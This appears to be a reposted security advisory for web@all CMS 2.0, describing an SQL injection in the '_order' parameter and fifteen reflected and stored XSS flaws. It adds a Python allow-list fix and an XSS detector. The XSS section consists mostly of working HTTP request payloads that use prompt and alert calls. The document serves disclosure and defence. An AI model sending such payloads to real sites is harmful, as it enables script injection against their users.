
web@all CMS 2.0: Multiple Vulnerabilities and Fixes

Date: 2013/4/19 12:09:00  Author: 平凡之路  Source: xuhantao.com

web@all CMS 2.0 (_order) SQL Injection Vulnerability

Vendor: web@all
Product web page:
Affected version: 2.0
 
  
 
Summary: web@all is a PHP content management system (CMS). If you know about it, you can use it to do nearly anything.
 
  
 
Desc: The application suffers from an SQL Injection vulnerability. Input passed via the GET parameter '_order' is not properly sanitised before being returned to the user or used in SQL queries. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code.
 
  
 
Tested on: Microsoft Windows 7 Ultimate SP1 (EN)
           Apache 2.4.2 (Win32)
           PHP 5.4.4
           MySQL 5.5.25a
 
  
 
  
 
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
                            @zeroscience
 
  
 
  
 
Advisory ID: ZSL-2012-5099
Advisory URL:

21.08.2012
 
  
 
--- 
 
  
 
  
 
/webatall/sys/index.php?_key=author&_order=1[SQL ATTACK QUERY]&_text[status]=-1&_type[]=0&mod=article 
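The usual fix for a sort-parameter injection, added here as an example and not taken from web@all or the advisory: because ORDER BY cannot be bound as a query parameter, the `_order` value is mapped onto an allow-list of sortable columns before it is interpolated, and only filter values are bound. The column names and the in-memory table are constructed for the demo; the real web@all schema is not on the page.

```python
import re
import sqlite3

# Constructed allow-list of sortable columns; a numeric _order (the advisory's
# "_order=1") is read as a 1-based position into it. The real web@all column
# names are not on the page and are assumed here.
SORTABLE = ["id", "title", "author", "timeadd"]
ORDER_RE = re.compile(r"^(?P<col>[a-z_]+|\d+)(?:\s+(?P<dir>asc|desc))?$", re.I)

def parse_order(raw):
    """Return (column, direction) for an allow-listed column name or position
    with optional ASC/DESC; anything else (e.g. "1[SQL ATTACK QUERY]") is None."""
    m = ORDER_RE.match(raw.strip())
    if not m:
        return None
    token = m.group("col").lower()
    if token.isdigit():
        if not 1 <= int(token) <= len(SORTABLE):
            return None
        column = SORTABLE[int(token) - 1]
    elif token in SORTABLE:
        column = token
    else:
        return None
    return column, (m.group("dir") or "asc").upper()

def build_article_query(order_raw, status):
    """ORDER BY cannot take a bound parameter, so the column name comes only from
    the allow-list; the WHERE value is still bound with a placeholder."""
    parsed = parse_order(order_raw)
    if parsed is None:
        raise ValueError("rejected _order value: %r" % order_raw)
    column, direction = parsed
    sql = "SELECT id, title FROM article WHERE status = ? ORDER BY %s %s" % (column, direction)
    return sql, (status,)

def demo():
    """Run the built query against a constructed in-memory table and return
    the titles in the requested order."""
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE article (id INTEGER, title TEXT, status INTEGER)")
    con.executemany("INSERT INTO article VALUES (?, ?, ?)",
                    [(1, "b", 1), (2, "a", 1), (3, "c", -1)])
    sql, params = build_article_query("title", 1)
    return [row[1] for row in con.execute(sql, params)]

if __name__ == "__main__":
    print(demo())
```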
 
  
 
============================================================================= 
 
  
 
web@all CMS 2.0 Multiple Remote XSS Vulnerabilities

Vendor: web@all
Product web page:
Affected version: 2.0
 
  
 
Summary: web@all is a PHP content management system (CMS). If you know about it, you can use it to do nearly anything.
 
  
 
Desc: web@all CMS suffers from multiple stored and reflected cross-site scripting vulnerabilities. The issues are triggered when input passed via several parameters to several scripts is not properly sanitized before being returned to the user. This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of an affected site.
 
  
 
----------------------------------------------------------------------------
  * Parameter *          * Method *          * Module *          * Type *
----------------------------------------------------------------------------

 1. act                    POST                member            Reflected
 2. security               POST                member            Reflected
 3. username               POST                member            Reflected
 4. id                     GET                 article           Reflected
 5. mod                    GET/POST            member            Reflected
 6. _flag                  GET                 article           Reflected
 7. _text[]                GET                 article           Reflected
 8. _text[alias]           GET                 article           Reflected
 9. _text[category]        GET                 article           Reflected
10. _text[email]           GET                 member            Reflected
11. _text[title]           GET                 article           Reflected
12. _text[username]        GET                 article           Reflected
13. _text[timeadd]         GET                 member            Reflected
14. title                  POST                article/cron      Stored
15. description            POST                cron              Stored

----------------------------------------------------------------------------
 
  
 
Tested on: Microsoft Windows 7 Ultimate SP1 (EN)
           Apache 2.4.2 (Win32)
           PHP 5.4.4
           MySQL 5.5.25a
 
  
 
  
 
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
                            @zeroscience
 
  
 
  
 
Advisory ID: ZSL-2012-5098
Advisory URL:

21.08.2012
 
  
 
--- 
 
  
 
  
 
Reflected: 
 
---------- 
 
  
 
  
 
POST /webatall/sys/action.php HTTP/1.1
Content-Length: 154
Content-Type: application/x-www-form-urlencoded
Cookie: guest=A0; __WA:auth=1; auth=2834d02f4b8925b021232f297a57a5a743894a0e4a801fc31
Host: localhost:80
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)

act=1%3cdiv%20style%3dwidth%3aexpression%28prompt%28900164%29%29%3e&goto=%2fsys&mod=member&password=Password&security=1&submit=Sign%20in&username=Username
 
  
 
  
 
POST /webatall/sys/action.php HTTP/1.1
Content-Length: 154
Content-Type: application/x-www-form-urlencoded
Cookie: guest=A0; __WA:auth=1; auth=2834d02f4b8925b021232f297a57a5a743894a0e4a801fc31
Host: localhost:80
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)

act=signin&goto=%2fsys&mod=1%3cdiv%20style%3dwidth%3aexpression%28prompt%28920000%29%29%3e&password=Password&security=1&submit=Sign%20in&username=Username
 
  
 
  
 
POST /webatall/sys/action.php HTTP/1.1
Content-Length: 159
Content-Type: application/x-www-form-urlencoded
Cookie: guest=A0; __WA:auth=1; auth=2834d02f4b8925b021232f297a57a5a743894a0e4a801fc31
Host: localhost:80
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)

act=signin&goto=%2fsys&mod=member&password=Password&security=1%3cdiv%20style%3dwidth%3aexpression%28prompt%28964492%29%29%3e&submit=Sign%20in&username=Username
 
  
 
  
 
POST /webatall/sys/action.php HTTP/1.1
Content-Length: 147
Content-Type: application/x-www-form-urlencoded
Cookie: guest=A0; __WA:auth=1; auth=2834d02f4b8925b021232f297a57a5a743894a0e4a801fc31
Host: localhost:80
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)

act=signin&goto=%2fsys&mod=member&password=admin&security=1&submit=Sign+in&username=1%3cdiv%20style%3dwidth%3aexpression%28prompt%28913398%29%29%3e
 
  
 
  
 
GET /webatall/sys/index.php?_flag=&_key=title&_order=&_text%5b%5d=&_text%5bcategory%5d=&_text%5bstatus%5d=-1&_type%5b%5d=0&id=%22%20onmouseover%3dprompt%28940245%29%20bad%3d%22&mod=article 
 
GET /webatall/sys/index.php?_text[timeadd]=1345564800&_type[timeadd]=2&mod=1%3cdiv%20style%3dwidth%3aexpression%28prompt%28961358%29%29%3e 
 
GET /webatall/sys/index.php?_flag=%22%20onmouseover%3dprompt%28916116%29%20bad%3d%22&_key=title&_order=&_text%5b%5d=&_text%5bcategory%5d=&_text%5bstatus%5d=-1&_type%5b%5d=0&id=&mod=article 
 
GET /webatall/sys/index.php?_flag=&_key=title&_order=&_text%5b%5d=%22%20onmouseover%3dprompt%28965775%29%20bad%3d%22&_text%5bcategory%5d=&_text%5bstatus%5d=-1&_type%5b%5d=0&id=&mod=article 
 
GET /webatall/sys/index.php?_text%5balias%5d=%22%20onmouseover%3dprompt%28989568%29%20bad%3d%22&_type%5balias%5d=0&mod=article 
 
GET /webatall/sys/index.php?_flag=&_key=title&_order=&_text%5b%5d=&_text%5bcategory%5d=%22%20onmouseover%3dprompt%28926119%29%20bad%3d%22&_text%5bstatus%5d=-1&_type%5b%5d=0&id=&mod=article 
 
GET /webatall/sys/index.php?_text%5bemail%5d=%22%20onmouseover%3dprompt%28999602%29%20bad%3d%22&_type%5bemail%5d=0&mod=member 
 
GET /webatall/sys/index.php?_text%5btitle%5d=%22%20onmouseover%3dprompt%28927731%29%20bad%3d%22&_type%5btitle%5d=0&mod=article 
 
GET /webatall/sys/index.php?_text%5busername%5d=%22%20onmouseover%3dprompt%28926119%29%20bad%3d%22&_type%5busername%5d=0&mod=member 
 
GET /webatall/sys/index.php?_text[timeadd]=%22%20onmouseover%3dprompt%28929079%29%20bad%3d%22&_type[timeadd]=2&mod=member 
 
  
 
  
 
  
 
Stored: 
 
------- 
 
  
 
  
 
POST /webatall/sys/action.php HTTP/1.1

act               sys_add
author            test
category_id       1
content           test
content_key       test
copyright         test
files
id
lang
menu
meta_description  test
meta_keywords     test
mod               article
options           test
status            1
thumbs            test
title             "><script>alert(1);</script>
 
  
 
  
 
  
 
POST HTTP/1.1

act            sys_add
cron           delete_unpaid_transaction.php
description    "><script>alert(2);</script>
id
menu
mod            cron
run_interval
status         1
title          "><script>alert(3);</script>
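As an added example, not part of the advisory, a small Python detector that decodes the kind of request lines and form bodies listed above and reports which parameter carries one of the three payload shapes the PoCs use (attribute breakout into an on* handler, CSS expression(), raw tag). The signature list and the benign third sample line are constructed; the other two sample lines are the advisory's own.

```python
import re
from urllib.parse import parse_qsl, urlsplit

# Constructed signatures for the payload shapes the PoCs above use: closing a
# quoted attribute to add an on* handler, an IE-era CSS expression() in a
# style attribute, and a raw tag (the stored "><script> case). Checked in
# order; the first hit decides the reason reported for a parameter.
SIGNATURES = [
    ("attribute breakout to event handler", re.compile(r"""["']\s*on\w+\s*=""", re.I)),
    ("css expression()", re.compile(r"expression\s*\(", re.I)),
    ("inline tag", re.compile(r"<\s*/?\s*[a-z]", re.I)),
]

def scan_params(method, params):
    """Return (method, module, parameter, reason) for every decoded parameter
    that matches a signature; module is the request's own mod= value."""
    module = dict(params).get("mod", "?")
    findings = []
    for name, value in params:
        for reason, pattern in SIGNATURES:
            if pattern.search(value):
                findings.append((method, module, name, reason))
                break
    return findings

def flag_request_line(line):
    """Scan one 'METHOD /path?query' line; parse_qsl undoes the percent-encoding
    and keeps PHP-style names such as _text[alias] intact."""
    method, target = line.split()[:2]
    return scan_params(method, parse_qsl(urlsplit(target).query, keep_blank_values=True))

def flag_form_body(body):
    """Scan a urlencoded POST body the same way (the action.php PoCs above)."""
    return scan_params("POST", parse_qsl(body, keep_blank_values=True))

# Two of the advisory's own PoC lines plus a constructed benign request.
SAMPLE_LINES = [
    "GET /webatall/sys/index.php?_text%5balias%5d=%22%20onmouseover%3dprompt%28989568%29%20bad%3d%22&_type%5balias%5d=0&mod=article",
    "GET /webatall/sys/index.php?_text[timeadd]=1345564800&_type[timeadd]=2&mod=1%3cdiv%20style%3dwidth%3aexpression%28prompt%28961358%29%29%3e",
    "GET /webatall/sys/index.php?_key=title&_order=1&_text%5bstatus%5d=-1&mod=article",
]

if __name__ == "__main__":
    for line in SAMPLE_LINES:
        print(flag_request_line(line))
```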
 

